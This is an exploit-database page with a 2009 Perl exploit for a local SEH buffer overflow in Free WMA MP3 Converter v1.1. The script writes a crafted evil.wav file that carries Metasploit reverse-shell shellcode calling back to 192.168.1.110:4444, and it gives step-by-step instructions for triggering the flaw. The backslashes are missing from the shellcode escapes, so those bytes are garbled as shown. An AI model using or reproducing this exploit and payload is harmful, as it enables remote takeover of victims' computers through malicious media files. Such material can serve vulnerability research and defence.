Free WMA MP3 Converter v1.1 (.wav) Local Buffer Overflow

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Free WMA MP3 Converter v1.1 (.wav) Local Buffer Overflow
# Published : 2009-10-09
# Author : KriPpLer
# Previous Title : ProFTPd 1.3.0 mod_ctrls Local Stack Overflow (opensuse)
# Next Title : FreeBSD 6.4 pipeclose()/knlist_cleardel() race condition exploit

#!/usr/bin/perl
#
############################################
# Free WMA MP3 Converter v1.1 (.wav) Local Buffer Overflow [seh]
# Vendor: http://www.eusing.com/
# Discovered by: KriPpLer 
# http://www.x-sploited.com/
# Tested on: Windows XP Pro SP2.
############################################

# Description: 

# FREE WMA MP3 converter v1.1 Local Buffer Overflow Exploit (SEH)

# This application is vulnerable to a buffer overflow when converting 
# malformed .wav files. This allows for arbitrary code execution on 
# the users machine.

# 1) Open Free WMA MP3 Converter
# 2) Select an output path in settings
# 3) Load the specially crafted evil.wav file
# 4) click Start...

# windows/shell_reverse_tcp - 341 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# LHOST=192.168.1.110, EXITFUNC=seh, LPORT=4444

my $shellcode =  
"xb8x1fxcbx50x0cxdbxcex29xc9xd9x74x24xf4xb1" .
"x4fx5bx31x43x14x03x43x14x83xc3x04xfdx3exac" .
"xe4x88xc1x4dxf5xeax48xa8xc4x38x2exb8x75x8c" .
"x24xecx75x67x68x05x0dx05xa5x2axa6xa3x93x05" .
"x37x02x1cxc9xfbx05xe0x10x28xe5xd9xdax3dxe4" .
"x1ex06xcdxb4xf7x4cx7cx28x73x10xbdx49x53x1e" .
"xfdx31xd6xe1x8ax8bxd9x31x22x80x92xa9x48xce" .
"x02xcbx9dx0dx7ex82xaaxe5xf4x15x7bx34xf4x27" .
"x43x9axcbx87x4exe3x0cx2fxb1x96x66x53x4cxa0" .
"xbcx29x8ax25x21x89x59x9dx81x2bx8dx7bx41x27" .
"x7ax08x0dx24x7dxddx25x50xf6xe0xe9xd0x4cxc6" .
"x2dxb8x17x67x77x64xf9x98x67xc0xa6x3cxe3xe3" .
"xb3x46xaex6bx77x74x51x6cx1fx0fx22x5ex80xbb" .
"xacxd2x49x65x2ax14x60xd1xa4xebx8bx21xecx2f" .
"xdfx71x86x86x60x1ax56x26xb5x8cx06x88x66x6c" .
"xf7x68xd7x04x1dx67x08x34x1exadx3fx73x89x8e" .
"xe8x7ax24x67xebx7cxa9x2bx62x9axa3xc3x22x35" .
"x5cx7dx6fxcdxfdx82xa5x45x9dx11x22x95xe8x09" .
"xfdxc2xbdxfcxf4x86x53xa6xaexb4xa9x3ex88x7c" .
"x76x83x17x7dxfbxbfx33x6dxc5x40x78xd9x99x16" .
"xd6xb7x5fxc1x98x61x36xbex72xe5xcfx8cx44x73" .
"xd0xd8x32x9bx61xb5x02xa4x4ex51x83xddxb2xc1" .
"x6cx34x77xffx9dx84x62x68x04x7dxcfxf4xb7xa8" .
"x0cx01x34x58xedxf6x24x29xe8xb3xe2xc2x80xac" .
"x86xe4x37xccx82";

# [junk*4116][nextseh][newseh][nops*24][shellcode...]

my $garbage = "A" x 4116;                  # 4116 bytes to reach nextseh.
my $nextseh = "xebx06x90x90";      # short jmp, nop nop overwrite
my $newseh = pack('V',0x1001BD04);  # 0x1001BD04      pop edi, pop - ret (from lame_enc.dll)
my $nops   = "x90" x 24;                     # 24 byte nop sled

my $scode = $shellcode;                     # 341 byte shellcode

open(myfile,'>evil.wav');

my $info = "rn====================================n";
$info = $info. "Free Wav to Wma Converter v1.1n";
$info = $info. "Local Buffer Overflow Exploit n";
$info = $info."Author: KriPpLern";
$info = $info."http://www.x-sploited.com/n";
$info = $info."====================================rnrn";
$info = $info."Usage: ./wmacon.plrnrn";

print $info;

print myfile $garbage.$nextseh.$newseh.$nops.$scode;

print "[*] evil.wav file created successfully...rn";
exit;